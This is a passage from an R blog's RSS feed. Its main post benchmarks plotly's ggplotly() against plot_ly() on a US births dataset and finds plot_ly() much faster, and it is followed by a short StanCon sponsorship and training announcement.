&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-comparing-plotly-ggplotly-plot-generation-times"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="analysis"&gt;Analysis&lt;/h3&gt;
&lt;p&gt;Let’s load and take a look at the data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Birthdays&amp;#34;&lt;/span&gt;, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(Birthdays)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## state year month day date wday births&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 AK 1969 1 1 1969-01-01 Wed 14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 AL 1969 1 1 1969-01-01 Wed 174&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 AR 1969 1 1 1969-01-01 Wed 78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 AZ 1969 1 1 1969-01-01 Wed 84&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 CA 1969 1 1 1969-01-01 Wed 824&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 CO 1969 1 1 1969-01-01 Wed 100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;First, we’ll create a very simple scatter graph of the mean births in every year.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;meanb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Birthdays &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(births))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Wrapping this as a {ggplot2} object inside &lt;code&gt;ggplotly()&lt;/code&gt; we obtain this…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(meanb) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="ggplotly1.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Whilst using &lt;code&gt;plot_ly()&lt;/code&gt; give us this…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; meanb,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plotly1.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Both graphs are, identical, bar styling, yes?
Now let’s use {microbenchmark} to see how their timings compare (for an overview of timing R functions, see our &lt;a href="https://www.jumpingrivers.com/blog/timing-in-r/"&gt;previous blog post&lt;/a&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(meanb) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; meanb,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval cld&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplotly 0.050139 0.052229 0.070750 0.054760 0.056785 1.56652 100 b&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## plotly 0.002475 0.002527 0.003017 0.002571 0.002674 0.03061 100 a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot&lt;/span&gt;(time)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="comparison1.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Now I thought nesting a {ggplot} object within &lt;code&gt;ggplotly()&lt;/code&gt; would be slower than using &lt;code&gt;plot_ly()&lt;/code&gt;, but I didn’t think it would be this slow. On average &lt;code&gt;ggplotly()&lt;/code&gt; is approximately 23 times slower than &lt;code&gt;plot_ly()&lt;/code&gt;. &lt;strong&gt;&lt;em&gt;23!&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Let’s take it up a notch. There we were plotting only 20 points, what about if we plot over 20,000? Here we will plot the min, mean and max births on each day.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Birthdays &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(births), min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(births), max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(births)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(birth_stat, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;date)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Wrapping this a {ggplot2} object inside &lt;code&gt;ggplotly()&lt;/code&gt; we obtain this graph…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; birth_stat)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="ggplotly2.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Whilst using &lt;code&gt;plot_ly()&lt;/code&gt; we obtain…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(date,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;value, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;birth_stat,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plotly2.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Again, both plots are identical, bar styling.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; birth_stat))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(date, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;value,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;birth_stat,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval cld&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplotly 0.335823 0.355301 0.389759 0.365353 0.378502 0.54746 100 b&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## plotly 0.002472 0.002534 0.002719 0.002585 0.002675 0.01179 100 a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot&lt;/span&gt;(time2)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="comparison2.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;On average &lt;code&gt;ggplotly()&lt;/code&gt; is 143 times slower than &lt;code&gt;plot_ly()&lt;/code&gt;, with the max run time being 0.547 seconds!&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;I’m going to level with you. Using &lt;code&gt;ggplotly()&lt;/code&gt; in interactive mode isn’t a problem. Well, it’s not a problem until your shiny dashboard or your markdown document has to generate a few plots at the same time. With only one plot, you’ll probably go with the method that gives you your style in the easiest way possible and you’ll do this with no repercussions. However, let’s say you’re making a shiny dashboard and it now has over 5 interactive graphs within it. Suddenly, if you’re using &lt;code&gt;ggplotly()&lt;/code&gt;, the lag we noticed in the analysis above starts to build up unnecessarily. That’s why I’d use &lt;code&gt;plot_ly()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;hr&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;R.version.string
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;R version 3.4.2 (2017-09-28)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#39;2.2.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#39;4.7.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Official StanCon Sponsor</title><link>https://www.jumpingrivers.com/blog/official-stancon-sponsor/</link><pubDate>Mon, 20 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/official-stancon-sponsor/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/official-stancon-sponsor/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/official-stancon-sponsor/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Stan is freedom-respecting, open-source software for facilitating statistical inference at the frontiers of applied statistics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Or to put it another way, it makes Bayesian inference fast and (a bit) easier.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt; is the premier conference for all things &lt;a href="http://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; related and this year it will take place at the &lt;a href="http://www.visitasilomar.com/" rel="external"&gt;Asilomar Conference Grounds&lt;/a&gt;, a National Historic Landmark on the Monterey Peninsula right on the beach.&lt;/p&gt;
&lt;h4 id="rstan-and-other-interfaces"&gt;RStan and other interfaces&lt;/h4&gt;
&lt;p&gt;One of the great features about Stan is that you can use Stan via R (or Python or …). The &lt;a href="https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started" rel="external"&gt;{rstan}&lt;/a&gt; package can be in installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and has been around for a few years, so is fairly stable. The easiest way to get started is to check out the rstan &lt;a href="https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started" rel="external"&gt;wiki&lt;/a&gt; page, which gives a couple of worked through examples.&lt;/p&gt;
&lt;h4 id="training"&gt;Training&lt;/h4&gt;
&lt;p&gt;If you are interested in learning more about Stan, we run a two-day &lt;a href="https://www.jumpingrivers.com/training/course/bayesian-inference-stan-rstan-pystan/"&gt;introduction to stan&lt;/a&gt; course. The course covers&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to Bayesian inference: A brief overview of the main ideas behind Bayesian inference.&lt;/li&gt;
&lt;li&gt;Markov chain Monte Carlo methods: A brief overview of Markov chain Monte Carlo methods for Bayesian computation and Hamiltonian Monte Carlo.&lt;/li&gt;
&lt;li&gt;The Stan language: An outline of the main components of a Stan program.&lt;/li&gt;
&lt;li&gt;Using RStan: A guide to the use of the R interface to Stan.&lt;/li&gt;
&lt;li&gt;Examples: Including linear regression, Poisson regression and hierarchical models&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Space is limited.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/official-stancon-sponsor/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Timing in R</title><link>https://www.jumpingrivers.com/blog/timing-in-r/</link><pubDate>Mon, 20 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/timing-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/timing-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/timing-in-r/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
